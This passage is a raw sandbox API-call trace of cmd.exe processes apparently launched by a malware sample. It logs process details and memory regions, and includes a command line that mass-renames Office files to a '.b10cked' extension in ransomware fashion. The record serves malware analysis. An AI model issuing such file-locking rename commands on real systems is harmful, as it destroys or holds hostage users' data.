GetConsoleTitleW (in: lpConsoleTitle=0x360930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.099] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0155.099] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0155.099] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0155.099] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0155.100] _wcsicmp (_String1="move", _String2=")") returned 68 [0155.100] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0155.100] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0155.100] _wcsicmp (_String1="IF", _String2="move") returned -4 [0155.100] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0155.100] _wcsicmp (_String1="REM", _String2="move") returned 5 [0155.100] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0155.103] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.103] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0155.103] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0155.103] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0155.103] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0155.103] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0155.103] _wcsicmp (_String1="move", _String2="CD") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="REN") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0155.104] _wcsicmp (_String1="move", _String2="SET") returned -6 [0155.104] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0155.104] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0155.104] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0155.104] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0155.104] _wcsicmp (_String1="move", _String2="MD") returned 11 [0155.104] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0155.104] _wcsicmp (_String1="move", _String2="RD") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0155.104] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0155.104] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0155.104] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0155.104] _wcsicmp (_String1="move", _String2="VER") returned -9 [0155.104] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0155.104] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0155.104] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0155.104] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0155.104] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0155.104] _wcsicmp (_String1="move", _String2="START") returned -6 [0155.104] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0155.104] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0155.104] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0155.105] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.106] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf574, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf56c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf56c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0155.107] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0155.107] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0155.107] _wcsicmp (_String1="ONINTL~1.TRX", _String2="..") returned 65 [0155.107] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~1.trx")) returned 0x2020 [0155.107] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.107] SetErrorMode (uMode=0x0) returned 0x0 [0155.107] SetErrorMode (uMode=0x1) returned 0x0 [0155.108] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1ceefc, lpFilePart=0x1ceee4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", lpFilePart=0x1ceee4*="ONINTL~1.TRX") returned 0x3c [0155.108] SetErrorMode (uMode=0x0) returned 0x1 [0155.108] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0155.108] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0155.108] _wcsicmp (_String1="ONINTL~1.TRX", _String2="..") returned 65 [0155.108] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~1.trx")) returned 0x2020 [0155.108] SetErrorMode (uMode=0x0) returned 0x0 [0155.108] SetErrorMode (uMode=0x1) returned 0x0 [0155.108] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cf378, lpFilePart=0x1cf110 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", lpFilePart=0x1cf110*="ONINTL~1.TRX") returned 0x3c [0155.108] SetErrorMode (uMode=0x0) returned 0x1 [0155.108] SetErrorMode (uMode=0x0) returned 0x0 [0155.108] SetErrorMode (uMode=0x1) returned 0x0 [0155.108] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf580, lpFilePart=0x1cf110 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x1cf110*="ONINTL.DLL.trx_dll.b10cked") returned 0x4a [0155.108] SetErrorMode (uMode=0x0) returned 0x1 [0155.108] SetLastError (dwErrCode=0x0) [0155.109] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll.b10cked")) returned 0xffffffff [0155.109] GetLastError () returned 0x2 [0155.109] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1cea8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea8c) returned 0x372128 [0155.109] FindNextFileW (in: hFindFile=0x372128, lpFindFileData=0x1cea8c | out: lpFindFileData=0x1cea8c) returned 0 [0155.109] GetLastError () returned 0x12 [0155.109] FindClose (in: hFindFile=0x372128 | out: hFindFile=0x372128) returned 1 [0155.110] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cb8) returned 0x372128 [0155.111] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ced24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0155.111] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ced24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0155.111] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll")) returned 0x2020 [0155.111] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0155.111] FindClose (in: hFindFile=0x372128 | out: hFindFile=0x372128) returned 1 [0155.111] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cecd8 | out: _Buffer=" 1") returned 9 [0155.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.111] GetFileType (hFile=0x7) returned 0x2 [0155.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0155.151] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cec64 | out: lpMode=0x1cec64) returned 1 [0155.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.151] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cec98 | out: lpConsoleScreenBufferInfo=0x1cec98) returned 1 [0155.151] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0155.152] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cecd8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0155.152] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cecbc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cecbc*=0x1a) returned 1 [0155.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.152] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0155.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.152] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0155.152] _get_osfhandle (_FileHandle=0) returned 0x3 [0155.152] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0155.153] SetConsoleInputExeNameW () returned 0x1 [0155.153] GetConsoleOutputCP () returned 0x1b5 [0155.153] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0155.153] SetThreadUILanguage (LangId=0x0) returned 0x409 [0155.153] exit (_Code=0) Process: id = "259" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21507 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21508 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21509 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21510 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 21511 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21512 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21513 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21514 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21515 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 21516 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21517 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21518 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21519 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21520 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 21521 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 21522 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21523 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21524 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21525 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21526 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21527 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21528 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21529 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21530 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21531 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 21532 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21533 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21534 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 21535 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 21536 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 21537 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 21538 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 21539 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 21540 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 322 os_tid = 0x694 [0156.173] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8cc | out: lpSystemTimeAsFileTime=0x18f8cc*(dwLowDateTime=0x97051b60, dwHighDateTime=0x1d440a9)) [0156.173] GetCurrentProcessId () returned 0xd60 [0156.173] GetCurrentThreadId () returned 0x694 [0156.173] GetTickCount () returned 0x2fef6 [0156.173] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8c4 | out: lpPerformanceCount=0x18f8c4*=21296263353) returned 1 [0156.174] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0156.174] __set_app_type (_Type=0x1) [0156.174] __p__fmode () returned 0x76b331f4 [0156.174] __p__commode () returned 0x76b331fc [0156.174] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0156.175] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0156.175] GetCurrentThreadId () returned 0x694 [0156.175] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x694) returned 0x38 [0156.175] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.175] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0156.175] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.175] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0156.175] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f85c | out: phkResult=0x18f85c*=0x0) returned 0x2 [0156.175] VirtualQuery (in: lpAddress=0x18f893, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.175] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0156.175] GetConsoleOutputCP () returned 0x1b5 [0156.176] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.176] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0156.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0156.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.176] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.176] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.177] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0156.177] GetEnvironmentStringsW () returned 0x210210* [0156.177] FreeEnvironmentStringsW (penv=0x210210) returned 1 [0156.177] GetEnvironmentStringsW () returned 0x210210* [0156.177] FreeEnvironmentStringsW (penv=0x210210) returned 1 [0156.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0xa0, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.177] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, 